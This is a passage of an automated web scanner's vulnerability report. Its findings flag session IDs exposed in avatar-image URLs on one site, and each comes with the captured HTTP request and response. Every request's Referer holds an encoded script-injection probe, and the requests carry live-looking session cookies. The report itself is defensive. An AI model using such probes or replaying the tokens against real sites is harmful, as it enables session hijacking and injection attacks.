GET /people/cariad/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1586 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:22 GMT
Server: Apache-Coyote/1.1
Last-Modified: Mon, 20 Dec 2010 13:19:20 GMT
Etag: "1586"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=10493 t=1313157143020874
Keep-Alive: timeout=5, max=90
Connection: Keep-Alive
Content-Length: 5665

.PNG
.
...IHDR...0...0......`n.....IDATx...    T....9...... .,.df2I&...@...!..VA.eU...(bAqA..Q.e..*......Z[...Z.Q."
*.k.j+..}..]no.{..s..3!3.'..?qjj.m:[...Gj8........5.Z.......;.Z...p......e........o..
...[SNIP]...

3.19. https://www.x.com/people/christiancrest/avatar  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/christiancrest/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/christiancrest/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:16 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=17931 t=1313157136902220
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Length: 1865

.PNG
.
...IHDR...0...0.....W.......IDATx....W..........m.so....[iU..C]je).
XD.l.@T0@.BX....HBH    .W. .(....SR....{.......y>.d..g....]..-..Fcx...^8..k$...~.;.>..D.    ...W..K.;    ..x..Z.V^.B..2l..F.6.h..;:
...[SNIP]...

3.20. https://www.x.com/people/ezimerchant/avatar  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/ezimerchant/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/ezimerchant/avatar;jsessionid=7B86CE8FA3BBFB8564D669ACF6D8115C.node0/22.png?a=1002 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: jive.recentHistory.-1=31342c323036333b31342c323030383b; s_pers=%20gpv_c43%3Dx%2520developer%2520network%253Acommunity%253A%2520introduce%2520yourself%7C1313159104192%3B%20tr_p1%3Dx%2520developer%2520network%253Acommunity%253A%2520introduce%2520yourself%7C1313159105062%3B%20gpv_events%3Dno%2520value%7C1313159105480%3B; JSESSIONID=7B86CE8FA3BBFB8564D669ACF6D8115C.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 14:11:04 GMT
Server: Apache-Coyote/1.1
Last-Modified: Wed, 28 Oct 2009 04:35:03 GMT
Etag: "1002"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=8013 t=1313158264449114
Keep-Alive: timeout=5, max=84
Connection: Keep-Alive
Content-Length: 2278

.PNG
.
...IHDR...0...0.....W.......IDATx...kl.e..G.AT.. .DH.......P.!.7......\Z..(....R...4P.m h)....HC%..P.....@.a..%.ZM.p.....ogg..n..v..of....].....5......:.n..thtb.F..ht4V...5.~f_*O....r.......
...[SNIP]...

3.21. https://www.x.com/people/inhouse/avatar  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/inhouse/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/inhouse/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:17 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=7776 t=1313157137338389
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Length: 1865

.PNG
.
...IHDR...0...0.....W.......IDATx....W..........m.so....[iU..C]je).
XD.l.@T0@.BX....HBH    .W. .(....SR....{.......y>.d..g....]..-..Fcx...^8..k$...~.;.>..D.    ...W..K.;    ..x..Z.V^.B..2l..F.6.h..;:
...[SNIP]...

3.22. https://www.x.com/people/jameshill/avatar  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/jameshill/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/jameshill/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:23 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=9191 t=1313157143974814
Keep-Alive: timeout=5, max=89
Connection: Keep-Alive
Content-Length: 1865

.PNG
.
...IHDR...0...0.....W.......IDATx....W..........m.so....[iU..C]je).
XD.l.@T0@.BX....HBH    .W. .(....SR....{.......y>.d..g....]..-..Fcx...^8..k$...~.;.>..D.    ...W..K.;    ..x..Z.V^.B..2l..F.6.h..;:
...[SNIP]...

3.23. https://www.x.com/people/judemichael2001/avatar  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/judemichael2001/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/judemichael2001/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:22 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=8739 t=1313157143045447
Keep-Alive: timeout=5, max=68
Connection: Keep-Alive
Content-Length: 1865

.PNG
.
...IHDR...0...0.....W.......IDATx....W..........m.so....[iU..C]je).
XD.l.@T0@.BX....HBH    .W. .(....SR....{.......y>.d..g....]..-..Fcx...^8..k$...~.;.>..D.    ...W..K.;    ..x..Z.V^.B..2l..F.6.h..;:
...[SNIP]...

3.24. https://www.x.com/people/lilbugclothing/avatar  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/lilbugclothing/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/lilbugclothing/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:22 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=11198 t=1313157143075751
Keep-Alive: timeout=5, max=80
Connection: Keep-Alive
Content-Length: 1865

.PNG
.
...IHDR...0...0.....W.......IDATx....W..........m.so....[iU..C]je).
XD.l.@T0@.BX....HBH    .W. .(....SR....{.......y>.d..g....]..-..Fcx...^8..k$...~.;.>..D.    ...W..K.;    ..x..Z.V^.B..2l..F.6.h..;:
...[SNIP]...

3.25. https://www.x.com/people/lovelycar8888/avatar  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/lovelycar8888/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/lovelycar8888/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:22 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=8650 t=1313157143024166
Keep-Alive: timeout=5, max=82
Connection: Keep-Alive
Content-Length: 1865

.PNG
.
...IHDR...0...0.....W.......IDATx....W..........m.so....[iU..C]je).
XD.l.@T0@.BX....HBH    .W. .(....SR....{.......y>.d..g....]..-..Fcx...^8..k$...~.;.>..D.    ...W..K.;    ..x..Z.V^.B..2l..F.6.h..;:
...[SNIP]...

3.26. https://www.x.com/people/lurobertson/avatar  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/lurobertson/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/lurobertson/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:22 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=7867 t=1313157143023151
Keep-Alive: timeout=5, max=89
Connection: Keep-Alive
Content-Length: 1865

.PNG
.
...IHDR...0...0.....W.......IDATx....W..........m.so....[iU..C]je).
XD.l.@T0@.BX....HBH    .W. .(....SR....{.......y>.d..g....]..-..Fcx...^8..k$...~.;.>..D.    ...W..K.;    ..x..Z.V^.B..2l..F.6.h..;:
...[SNIP]...

3.27. https://www.x.com/people/mbtmobile/avatar  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/mbtmobile/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/mbtmobile/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:23 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=10785 t=1313157144017520
Keep-Alive: timeout=5, max=73
Connection: Keep-Alive
Content-Length: 1865

.PNG
.
...IHDR...0...0.....W.......IDATx....W..........m.so....[iU..C]je).
XD.l.@T0@.BX....HBH    .W. .(....SR....{.......y>.d..g....]..-..Fcx...^8..k$...~.;.>..D.    ...W..K.;    ..x..Z.V^.B..2l..F.6.h..;:
...[SNIP]...

3.28. https://www.x.com/people/michaelcaplan/avatar  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/michaelcaplan/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/michaelcaplan/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:23 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=12230 t=1313157143974612
Keep-Alive: timeout=5, max=86
Connection: Keep-Alive
Content-Length: 1865

.PNG
.
...IHDR...0...0.....W.......IDATx....W..........m.so....[iU..C]je).
XD.l.@T0@.BX....HBH    .W. .(....SR....{.......y>.d..g....]..-..Fcx...^8..k$...~.;.>..D.    ...W..K.;    ..x..Z.V^.B..2l..F.6.h..;:
...[SNIP]...

3.29. https://www.x.com/people/mikertjones/avatar  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/mikertjones/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/mikertjones/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:16 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=9603 t=1313157137187386
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Length: 1865

.PNG
.
...IHDR...0...0.....W.......IDATx....W..........m.so....[iU..C]je).
XD.l.@T0@.BX....HBH    .W. .(....SR....{.......y>.d..g....]..-..Fcx...^8..k$...~.;.>..D.    ...W..K.;    ..x..Z.V^.B..2l..F.6.h..;:
...[SNIP]...

3.30. https://www.x.com/people/moneygun/avatar  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/moneygun/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/moneygun/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1013 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:16 GMT
Server: Apache-Coyote/1.1
Last-Modified: Wed, 28 Oct 2009 04:35:03 GMT
Etag: "1013"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=7141 t=1313157136784012
Keep-Alive: timeout=5, max=91
Connection: Keep-Alive
Content-Length: 2959

.PNG
.
...IHDR...0...0.....W......VIDATx...iT.V../L..z..........V..V.Mq....UkUpCAAD.E.T....B......+TD(...#Kd.5.T.Q .y!.:m...|.w.;.....{.............z..K.r...c..9n'}..4A...<I1..........v.A...`..*....
...[SNIP]...

3.31. https://www.x.com/people/pdumas/avatar  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/pdumas/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/pdumas/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:16 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
Content-Language: en-US
JP: D=7093 t=1313157137047579
Keep-Alive: timeout=5, max=98
Connection: Keep-Alive
Content-Length: 1865

.PNG
.
...IHDR...0...0.....W.......IDATx....W..........m.so....[iU..C]je).
XD.l.@T0@.BX....HBH    .W. .(....SR....{.......y>.d..g....]..-..Fcx...^8..k$...~.;.>..D.    ...W..K.;    ..x..Z.V^.B..2l..F.6.h..;:
...[SNIP]...

3.32. https://www.x.com/people/structuralartistry/avatar  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   https://www.x.com
Path:   /people/structuralartistry/avatar

Issue detail

The URL in the request appears to contain a session token within the query string:

Request

GET /people/structuralartistry/avatar;jsessionid=7D63C2975DA8555B3A2A0A1E037EF216.node0/22.png?a=1020 HTTP/1.1
Host: www.x.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: https://www.x.com/community/ppx/xspaces/introduce?c05d5%22%3E%3CScRiPt%3Ealert(document.location)%3C/ScRiPt%3E8ef9c8977ed=1
Cookie: JSESSIONID=7D63C2975DA8555B3A2A0A1E037EF216.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e26151d; jive.recentHistory.-1=31342c323030383b; s_sess=%20s_cc%3Dtrue%3B%20v31%3DD%253DpageName%3B%20SC_LINKS%3D%3B%20s_sq%3D%3B%20s_ppv%3D22%3B

Response

HTTP/1.1 200 OK
Date: Fri, 12 Aug 2011 13:52:16 GMT
Server: Apache-Coyote/1.1
Last-Modified: Sun, 01 Nov 2009 00:52:07 GMT
Etag: "1020"
Content-disposition: inline
Content-Type: image/png;charset=UTF-8
